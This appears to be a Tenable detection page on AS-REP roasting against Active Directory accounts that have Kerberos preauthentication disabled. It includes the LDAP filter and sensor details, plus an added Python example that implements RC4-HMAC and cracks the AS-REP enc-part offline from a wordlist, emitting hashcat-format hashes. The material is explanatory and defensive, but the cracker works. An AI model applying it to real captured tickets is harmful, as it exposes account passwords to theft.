Steal or Forge Kerberos Tickets: AS-REP Roasting

Description

Adversaries may reveal the credentials of accounts that have Kerberos preauthentication disabled by cracking Kerberos messages offline. Preauthentication is what protects against offline password cracking. When it is enabled, a user requesting a ticket starts by sending the Domain Controller (DC) an Authentication Server Request (AS-REQ) that carries a timestamp encrypted with a key derived from the user's password (for RC4-HMAC, the NT hash). Only if the DC can decrypt that timestamp with the key it holds for the user does it answer with an Authentication Server Response (AS-REP) that contains the Ticket Granting Ticket (TGT). Part of the AS-REP (its enc-part, which carries the session key) is encrypted with that same user key, not merely signed. When an account has the DONT_REQ_PREAUTH flag set in userAccountControl (bit 0x400000, decimal 4194304), the DC skips the timestamp check and returns the AS-REP to anyone who names the account in an AS-REQ. An attacker who knows or can enumerate such account names therefore obtains the encrypted part without any credentials, cracks it offline against a wordlist, and a successful guess yields the account's cleartext password. The LDAP sensor listed below looks for exactly this flag on user objects; the equivalent LDAP filter is (userAccountControl:1.2.840.113556.1.4.803:=4194304).
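The exchange described above, carried through to the offline attack, as an added example that is not part of the original page and not Tenable's code. It implements the RC4-HMAC (etype 23) encryption of RFC 4757 from the standard library only (MD4 is written out because hashlib's md4 needs OpenSSL's legacy provider), encrypts a stand-in AS-REP enc-part under the user's NT hash, emits it in the hashcat `$krb5asrep$23$` form (mode 18200), and recovers the password by trying each wordlist entry against nothing but that ciphertext. The account name, realm, password, userAccountControl value, wordlist, plaintext and fixed confounder are all constructed for the example; key usage 8 is the value Windows applies to the RC4 AS-REP enc-part and the one hashcat mode 18200 assumes (RFC 4120 lists 3 for this message).

```python
"""Added example (not Tenable's or the page's code): AS-REP roasting as an offline attack."""
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF
DONT_REQ_PREAUTH = 0x400000   # userAccountControl bit that disables Kerberos preauth
ASREP_RC4_KEY_USAGE = 8       # key usage Windows applies to the RC4 AS-REP enc-part; hashcat 18200 assumes it

def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, inlined because hashlib's md4 needs OpenSSL's legacy provider."""
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):                                   # round 1, F, words 0..15
            a = rotl((a + ((b & c) | (~b & d)) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 2, G, words 0,4,8,12,1,...
            k = (i % 4) * 4 + i // 4
            a = rotl((a + ((b & c) | (b & d) | (c & d)) + x[k] + 0x5A827999) & MASK32,
                     (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 3, H, words 0,8,4,12,2,...
            k = int(format(i, "04b")[::-1], 2)
            a = rotl((a + (b ^ c ^ d) + x[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(v + w) & MASK32 for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):                                      # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                                         # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def nt_hash(password: str) -> bytes:                          # RC4-HMAC long-term key = NT hash
    return md4(password.encode("utf-16-le"))

def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()

def rc4hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757 section 6: edata = checksum || RC4(Ke, confounder || plaintext)."""
    ki = hmac_md5(key, struct.pack("<I", usage))
    checksum = hmac_md5(ki, confounder + plaintext)
    return checksum + rc4(hmac_md5(ki, checksum), confounder + plaintext)

def rc4hmac_decrypt(key: bytes, usage: int, edata: bytes):
    """Returns the plaintext, or None when the checksum does not verify (wrong key)."""
    ki = hmac_md5(key, struct.pack("<I", usage))
    checksum, body = edata[:16], edata[16:]
    plain = rc4(hmac_md5(ki, checksum), body)
    if not hmac.compare_digest(hmac_md5(ki, plain), checksum):
        return None
    return plain[8:]                                          # drop the 8-byte confounder

def asrep_roastable(user_account_control: int) -> bool:      # the LDAP sensor's per-account check
    return bool(user_account_control & DONT_REQ_PREAUTH)

def hashcat_line(user: str, realm: str, edata: bytes) -> str:  # hashcat -m 18200 / john krb5asrep input
    return f"$krb5asrep$23${user}@{realm}:{edata[:16].hex()}${edata[16:].hex()}"

def crack_asrep(edata: bytes, wordlist):
    """Offline attack: derive a key from each candidate and see whether the checksum verifies."""
    for candidate in wordlist:
        if rc4hmac_decrypt(nt_hash(candidate), ASREP_RC4_KEY_USAGE, edata) is not None:
            return candidate
    return None

# Constructed sample data.  A real enc-part is the DER-encoded EncASRepPart; a placeholder
# stands in for it, and the confounder is fixed for reproducibility (a KDC uses 8 random bytes).
SAMPLE_USER, SAMPLE_REALM = "svc_backup", "CORP.LOCAL"
SAMPLE_PASSWORD = "Summer2023!"
SAMPLE_UAC = 0x410200                     # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD | DONT_REQ_PREAUTH
SAMPLE_ENC_AS_REP_PART = b"\x79\x81\x9f" + b"EncASRepPart placeholder (session key, nonce, flags)"
SAMPLE_CONFOUNDER = bytes(range(8))
WORDLIST = ["Password1", "Welcome1", "Summer2023!", "Autumn2023!"]

def demo():                               # DC answers the preauth-disabled account; attacker roasts it
    if not asrep_roastable(SAMPLE_UAC):
        return None, None
    edata = rc4hmac_encrypt(nt_hash(SAMPLE_PASSWORD), ASREP_RC4_KEY_USAGE,
                            SAMPLE_ENC_AS_REP_PART, SAMPLE_CONFOUNDER)
    return hashcat_line(SAMPLE_USER, SAMPLE_REALM, edata), crack_asrep(edata, WORDLIST)

if __name__ == "__main__":
    line, recovered = demo()
    print(line, "\nrecovered password:", recovered)
```

Nothing in crack_asrep talks to a DC: once the AS-REP has been captured, every guess costs one MD4, three HMAC-MD5 operations and one RC4 pass, which is why the cleartext of a weak password on a preauth-disabled account falls quickly. Accounts whose AS-REP is issued with AES (etype 17/18) are still roastable, only at a higher cost per guess, so the durable fix is clearing DONT_REQ_PREAUTH rather than changing encryption types.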

Products, Sensors, and Dependencies

Product: Tenable Identity Exposure
Dependencies: (none)
Data source: Active Directory
Access required: Authenticated AD user
Protocol: LDAP/S (389/636)
Data collected: Domain User + UAC
Notes: Plugin ID: 22-C-KERBEROS-CONFIG-ACCOUNT:R-KERB-WEAK-CONFIG-DONT-REQUIRE-PREAUTH-ACCOUNT

Product: Tenable Identity Exposure
Dependencies: Password Sync
Data source: Active Directory
Access required: Privileged AD user
Protocol: RPC (135 + high ports)
Data collected: User Password
Notes: Plugin ID: C-PASSWORD-HASHES-ANALYSIS

References

Tenable Identity Exposure DCSync feature

Attack Path Technique Details

Framework: MITRE ATT&CK

Family: Credential Access

Sub-Technique: AS-REP Roasting

Platform: Windows

Products Required: Tenable Identity Exposure

Tenable Release Date: 2022 Q3